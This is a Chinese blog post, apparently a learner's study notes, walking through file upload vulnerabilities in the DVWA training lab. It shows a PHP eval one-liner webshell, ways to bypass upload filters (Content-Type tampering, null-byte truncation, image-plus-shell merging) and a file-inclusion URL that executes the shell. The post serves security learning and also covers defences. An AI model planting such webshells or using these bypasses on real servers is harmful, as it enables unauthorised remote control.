Web安全 学习日记11 - 文件上传(File Upload)

已于 2023-04-05 20:19:09 修改
阅读量295 收藏 1
点赞数
分类专栏: Web安全 文章标签: web安全 学习 php
于 2023-03-16 20:06:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46081990/article/details/129559475
版权

文章目录

文件上传漏洞(File Upload)

基础知识

总体参考此链接:太厉害了,终于有人能把文件上传漏洞讲的明明白白了

WebShell?
 - 简称网页后门,是运行在Web应用之上的远程控制程序。
 - webShell其实就是一张网页,由PHP、JSP、ASP、ASP.NET等这类web应用程序语言开发,但webShell并不具备常见网页的功能,例如登录、注册、信息展示等功能,一般会具备文件管理、端口扫描、提权、获取系统信息等功能。
 - 拥有较完整功能的webshell,称为大马。
 - 功能简易的webshell,称为小马
WebShell之PHP一句话木马?
<?php @eval($_POST[x]); ?>

 - $_POST[x]: 获取 POST请求参数中X的值。例如POST请求中传递 x=phpinfo();,那么 $_POST[x]就等同于'phpinfo()'
 - eval()将字符串当做PHP代码去执行。例如 eval('phpinfo();'),其中 phpinfo();会被当做PHP代码去执行

<?php @eval($_POST[x]); ?>   实际上的传递过程是这样的
			↓
			↓			
			↓
<?php @eval('phpinfo();'); ?> 实际的语句是这样的
WebShell 管理工具有哪些?
中国菜刀
中国蚁剑
冰蝎
哥斯拉
......
文件上传漏洞是什么?

文件上传漏洞是指文件上传功能没有对上传的文件做合理严谨的过滤,导致用户可以利用此功能,上传能被服务端解析执行的文件,并通过此文件获得执行服务端命令的能力。

文件上传的检测方式有哪些?
 - 客户端Javascript文件名后缀验证
 - 服务器端MIME类型验证,即验证报文中的Content-Type
 - 服务器端文件名后缀验证
 - 服务器端文件内容验证,即验证文件头
文件上传怎么绕过黑/白名单?

参考此链接:文件上传漏洞及绕过检测的方式

文件上传漏洞如何防御?
 - 服务端文件扩展名使用白名单检测+文件名重命名
 - 对文件内容进行检测
 - 对中间件做安全的配置

DVWA靶场下的文件上传漏洞

Low

查看源码:发现没有检查后缀名,直接对字符串进行了拼接然后上传,所以任意类型的文件都可以上传,存在很严重的文件上传漏洞,我们直接构造一句话木马,然后上传。

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}

?>

构造一句话木马,然后上传:

<?php @eval($_POST[x]); ?>

在这里插入图片描述
上传成功,并且页面回显了上传文件所在的路径,这样一来我们可以结合文件包含漏洞,执行恶意代码。
在这里插入图片描述
打开文件包含(Low级别)界面,在url栏输入payload,然后用hackbar插件Post Data

http://192.168.124.91/DVWA/vulnerabilities/fi/?page=../../hackable/uploads/webshell.php

在这里插入图片描述
成功执行了恶意代码phpinfo();
在这里插入图片描述
尝试用中国蚁剑链接,口令为x
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Medium

查看源码:发现其检测了Content-Type只能为image/jpeg或image/png,并且限制了所传文件的大小<10000bit。

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

绕过思路1:先将webshell.php后缀改为webshell.png,然后利用bp抓包(中间人攻击)把webshell.png改回webshell.php
绕过思路2:选择上传webshell.php,然后利用bp抓包(中间人攻击)把Content-Type改为image/jpeg或image/png
绕过思路3:使用%00截断绕过,在php<5.3.4中,处理字符串的函数认为0x00是终止符。那么我们可以利用 00截断 的方法来上传一句话木马。网站上传函数处理a.php%00.jpg时,首先后缀名是合法的jpg格式,可以上传,在点击上传后,使用burpsuite进行抓包拦截,点击右键发送至repeater模块,选择 %00 右键进行url-decode编码,之后点击send发送,可以看见文件a.php上传成功。然后就可以用菜刀连接了。(或者将上传的php文件命名为a.php .jpg[中间有空格],抓包后选择repeater模块,之后点击hex选择十六进制编码,在该文件名对应的行数,将 20 改为 00,之后选择send发送,也可使php文件上传成功)
参考连接:DVWA靶场-文件上传漏洞

这里以思路1为例:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

High

查看源码:发现使用了 getimagesize() 函数,该函数返回图像文件的大小、尺寸、文件类型和一个可以用于普通 HTML 文件中 IMG 标记中的 height/width 文本字符串,但重点是若指定图像不是有效图像的话,getimagesize() 将返回 FALSE 并产生一条 E_WARNING级的错误。

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

尝试上传刚才的webshell2.png,里面的内容为:

<?php @eval($_POST['x']); ?>

发现页面回显上传失败,原因是getimagesize函数返回了FALSE,没有识别到文件头
在这里插入图片描述
于是我们尝试用图片马绕过,先保存一张小图片,命名为 1.jpg ,然后将一句话木马写到 2.txt 里,接着以管理员身份允许命令行输入:

copy 1.jpg/b + 2.txt webshell3.jpg

这条命令可以把这两个文件合并,合并后显示为webshell3.jpg(有jpg的话需要加个/b)
页面回显上传成功
在这里插入图片描述
结合文件包含漏洞,爆出php版本信息
在这里插入图片描述

Impossible

查看源码:发现代码中加入了token机制用于防御CSRF攻击,并对文件名进行了MD5加密,防止了00截断绕过过滤规则,同时对文件后缀和文件类型做了白名单设置,并且还对文件内容作了严格的检查,不符合图片的内容一律舍弃,导致攻击者无法将含有恶意代码的图片上传成功。

<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );


    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Where are we going to be writing to?
    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
    $target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
        ( $uploaded_size < 100000 ) &&
        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
        if( $uploaded_type == 'image/jpeg' ) {
            $img = imagecreatefromjpeg( $uploaded_tmp );
            imagejpeg( $img, $temp_file, 100);
        }
        else {
            $img = imagecreatefrompng( $uploaded_tmp );
            imagepng( $img, $temp_file, 9);
        }
        imagedestroy( $img );

        // Can we move the file to the web root from the temp folder?
        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
            // Yes!
            echo "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";
        }
        else {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }

        // Delete any temp files
        if( file_exists( $temp_file ) )
            unlink( $temp_file );
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
// Generate Anti-CSRF token
generateSessionToken();
?>
Ch4ser
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP反序列化入门手把手详解
顶峰
02-08 1848
php
【DVWA】File Upload
过期的秋刀鱼
08-16 568
当用户在在文件的功能模块处上文件时,如果WEB应用在文件过程中没有对文件安全性进行有效的校验,攻击者可以通过上WEBshell等恶意文件对服务器进行攻击,这种情况下认为系统存在文件漏洞,根据上文件存放位置不同,上后对文件操作不用,可能会导致不一样的结构,包括完全控制系统,覆盖服务器文件等等。文件漏洞的利用分两步,第一需要能上恶意文件,第二,恶意文件需要被触发,通过服务端自动运行触发或者攻击者配合其他漏洞手动触发。上成功,给出了上文件路径,使用蚁剑连接一句话木马。
文件漏洞实验-通过截取http请求绕过前端javascript验证进行文件
LIULIUAINI66的博客
11-16 2074
很多网站为了减少服务器端的压力,在后台方面减少验证,而只在web前端使用Javascript进行验证,殊不知这样大大增加了安全隐患。在渗透测试中经常会进行HTTP请求的截取来发现一些隐秘的漏洞。例如:绕过Javascript验证、发现隐藏标签内容等。
文件的工具包fileupload
李卫康的博客
07-09 1212
1.肯定要导入apche的jar包  2.要使用的类的介绍..  2.1DiskFileItemFactory public DiskFileItemFactory(int sizeThreshold, java.io.File repository) public DiskFileItemFactory()public void setSizeThreshold(int sizeThreshol...
java 上视频后的路径_Java上视频(mencoder)
weixin_33324197的博客
02-13 177
import java.io.File;import java.io.IOException;import java.sql.Timestamp;import java.text.DecimalFormat;import java.util.Arrays;import java.util.Iterator;import javax.servlet.http.HttpServletRequest;i...
FileUploadUtils文件工具
usa_washington的博客
08-25 207
文件
Angular angular-file-upload文件的示例代码
10-18
主要介绍了Angular angular-file-upload文件的示例代码,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
cypress-file-upload:文件测试变得容易
04-29
赛普拉斯文件 文件测试变得容易。 该软件包添加了一个自定义的命令,使您可以抽象化如何通过HTML控件精确上文件,并专注于测试用户工作流程。 目录 覆盖文件名 使用空的灯具文件 我想看一些真实的例子 ...
文件插件 ng-file-upload
05-09
**文件插件 ng-file-upload** 是一个专为AngularJS框架设计的高效、可靠的文件解决方案。这个插件由第三方开发者构建,旨在处理大文件,同时提供了丰富的功能和易于使用的API,使得在Web应用中集成文件...
docker-simple-file-upload:docker 容器中简单、安全文件 API
08-04
您可以像这样使用 curl 上文件: > curl -XPOST -F ' data=@testuser-file.txt ' dockerhost:3000/upload ? key=TESTUSER 支持多个键,每个键都以 1:1 的比例映射到磁盘上的某个位置。 密钥的任何其他上都将...
WEBshell与文件漏洞
LJH1999ZN的博客
02-19 4695
一、文件漏洞的原理 如果web应用程序对上文件安全性没有过滤和校验,攻击者可以通过上webshell恶意文件对服务器进行攻击 。 二、文件的原理 1.有文件功能 2.上文件的目录能解析脚本文件 3.能访问到上文件 三、文件攻击 文件防护和绕过手段 1.文件漏洞--绕过前端js检测 由于网站客户端对文件的上类型做了限制,不允许我们上.php文件,我们可以通过bp抓取发送数据包,然后将数据包做改变即可 ...
文件漏洞笔记
qq_32812063的博客
11-28 1687
文件漏洞笔记
命令执行&文件
wtylcam的博客
11-03 1160
命令执行&文件
FileUpload文件时客户端的简单验证
One ITer
05-14 3433
 FileUpload文件时可以在客户端作一些简单验证,比如文件的扩展名等信息,也可以给出一些提示!下面是一个验证上Excel文件的例子,由于Excel文件后,数据将导入到数据库中,所以在最后还加了一个确认提示!1、页面代码:...@ Page Language="C#" AutoEventWireup="true" CodeFile="Upload.aspx.cs" Inh
JS验证FileUpload控件
weixin_33805992的博客
08-13 69
<script language="javascript" type="text/javascript"> function check() { var obj=document.getElementById("_FileNewPro"); if(obj.value...
验证FileUpLoad文件类型
POWER
05-30 191
ValidationExpression="^(([a-zA-Z]:)|(\{2}w+)$?)(\(w[w].*))(.jpg|.JPG|.gif|.GIF|.bmp|.BMP)$" \u4e00-\u9fa5中文 ^([a-zA-Z]:\\)[0-9a-zA-Z\u4e00-\u9fa5]*(.jpg|.JPG|.gif|.GIF|.bmp|.BMP)$ [...
渗透实战-JSP上webshell报错500
Azjj
04-11 1817
从毕业到现在接近3年了,也是终于迈出了跳槽的一步,本身不是很想跳槽,但是各种原因吧,还是跟上家公司说拜拜了,呆了2年多,进步了很多,感谢上家提供的平台,这篇故事发生在我入职新公司的第一天,上家公司我的一位组员,找到我,感觉这个可以学习一下,主要是一个渗透思路问题。 懒得打字了,上的地方就大约是这个情况 ,看聊天聊天记录吧,大概就是可以上webshell,但是报错 下班后回家做了一顿饭,因为是跟xe合租的房子,他对象出去有事,只能我亲自下厨,因为是刚搬过来,没有锅盖,直接起锅烧油...
DVWA & File Upload文件最详细绕过
热门推荐
Hackpatrick的博客
08-04 2万+
DVWA的使用练习: 今天学习的内容很有意思,也很实用。 DVWA其实本质上就是一个脆弱系统,它需要的是php+mysql的环境,旨在为安全人员提供一个合法的环境用来测试自己的专业技能和工具,并且让web安全工作着深刻的理解漏洞防范和入侵的本质原理,很适合我们这种小白锻炼自己,好废话不多说。。。。。 首先DVWA环境安装: 在下载DVWA之前我们需要一个php+mysql的环境,apach...
vue web端不使用el-upload文件封装
最新发布
05-24
在Vue的web端,如果不想使用`el-upload`组件上文件,可以通过以下方式进行封装: 1. 在HTML中添加一个`input`标签,通过该标签选择文件并获取文件路径。 2. 通过Vue的`data`属性绑定该标签的值,并在`methods`中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值